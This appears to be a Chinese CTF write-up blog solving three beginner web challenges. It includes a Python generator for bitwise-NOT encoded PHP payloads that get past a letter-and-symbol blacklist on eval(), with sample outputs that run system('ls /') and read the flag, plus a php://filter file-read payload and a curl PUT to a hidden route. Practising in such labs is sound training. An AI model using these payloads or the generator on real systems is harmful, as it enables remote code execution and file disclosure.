[SWPUCTF 2021 新生赛]hardrce
开局给源码,只看一眼
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
| <?php
header("Content-Type:text/html;charset=utf-8");
error_reporting(0);
highlight_file(__FILE__);
if(isset($_GET['wllm']))
{
$wllm = $_GET['wllm'];
$blacklist = [' ','\t','\r','\n','\+','\[','\^','\]','\"','\-','\$','\*','\?','\<','\>','\=','\`',];
foreach ($blacklist as $blackitem)
{
if (preg_match('/' . $blackitem . '/m', $wllm)) {
die("LTLT说不能用这些奇奇怪怪的符号哦!");
}}
if(preg_match('/[a-zA-Z]/is',$wllm))
{
die("Ra's Al Ghul说不能用字母哦!");
}
echo "NoVic4说:不错哦小伙子,可你能拿到flag吗?";
eval($wllm);
}
else
{
echo "蔡总说:注意审题!!!";
}
?> 蔡总说:注意审题!!!
|
这都过滤了啥,给deepseek看看
d导思考了很久,给了几个payload,都无法起效
上网一找,看来这种应该叫做无字母rec,如名字,就是无法传入字母字符啥的
https://www.cnblogs.com/pursue-security/p/15404150.html
故叫d导帮写了个脚本来构造payload
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
| import re
def generate_neg_payload(s):
payload = []
for c in s:
neg = (~ord(c)) & 0xFF
payload.append(f"%{neg:02X}")
return ''.join(payload)
def parse_command(cmd):
pattern = r'^\s*?(\w+?)\s*?\(\s*?[\'"](.*?)[\'"]\s*?\)\s*?;?'
match = re.match(pattern, cmd)
if not match:
raise ValueError("命令格式错误!请使用 function('argument') 格式")
return match.group(1), match.group(2)
def main():
cmd = input("请输入PHP命令(示例:system('ls /'):").strip()
try:
func, arg = parse_command(cmd)
func_neg = generate_neg_payload(func)
arg_neg = generate_neg_payload(arg)
payload = f"(~{func_neg})(~{arg_neg});"
print("\n生成的取反Payload:")
print(payload)
print("\n使用说明:")
print("1. 需要目标环境开启短标签支持")
print("2. 确保PHP版本支持这种调用方式")
print("3. 实际使用时可能需要URL编码整个payload")
print("4. 示例最终形式:?code=~%8C%86%8C%8B%9A%92~%93%8C%DF%D0")
except Exception as e:
print(f"错误:{str(e)}")
if __name__ == "__main__":
main()
|
示例:
1
2
3
4
5
6
7
8
9
10
11
| system('ls');
生成的取反Payload:
(~%8C%86%8C%8B%9A%92)(~%93%8C);
system('ls /');
生成的取反Payload:
(~%8C%86%8C%8B%9A%92)(~%93%8C%DF%D0);
system('cat /flllllaaaaaaggggggg');
生成的取反Payload:
(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%93%93%93%93%93%9E%9E%9E%9E%9E%9E%98%98%98%98%98%98%98);
|
[SWPUCTF 2022 新生赛]ez_ez_php
开题给源码:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| <?php
error_reporting(0);
if (isset($_GET['file'])) {
if ( substr($_GET["file"], 0, 3) === "php" ) {
echo "Nice!!!";
include($_GET["file"]);
}
else {
echo "Hacker!!";
}
}else {
highlight_file(__FILE__);
}
|
源码大概意思是有个substr函数截取file传入参数前3位,所以前3位得是’php’,这直接就是提示伪协议了啊
?file=php://filter/convert.base64-encode/resource=flag.php
1
2
3
| NSSCTF{flag_is_not_here}
real_flag_is_in_'flag'
换个思路,试试PHP伪协议呢
|
?file=php://filter/convert.base64-encode/resource=flag
拿到正确flag,但是啊但是
尽然直接访问/flag 就能拿
[GDOUCTF 2023]EZ WEB
打开题目是一个假按钮,扫了一下发现/src有如下:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
|
import flask
app = flask.Flask(__name__)
@app.route('/', methods=['GET'])
def index():
return flask.send_file('index.html')
@app.route('/src', methods=['GET'])
def source():
return flask.send_file('app.py')
@app.route('/super-secret-route-nobody-will-guess', methods=['PUT'])
def flag():
return open('flag').read()
|
老规矩,先问d导
1
| curl -X PUT http://node5.anna.nssctf.cn:28256/super-secret-route-nobody-will-guess
|
直接返回flag,行,看看源码
好像是规定了几个条件
那我猜这可能是一个python后端?
以前也没见过,那现在知道了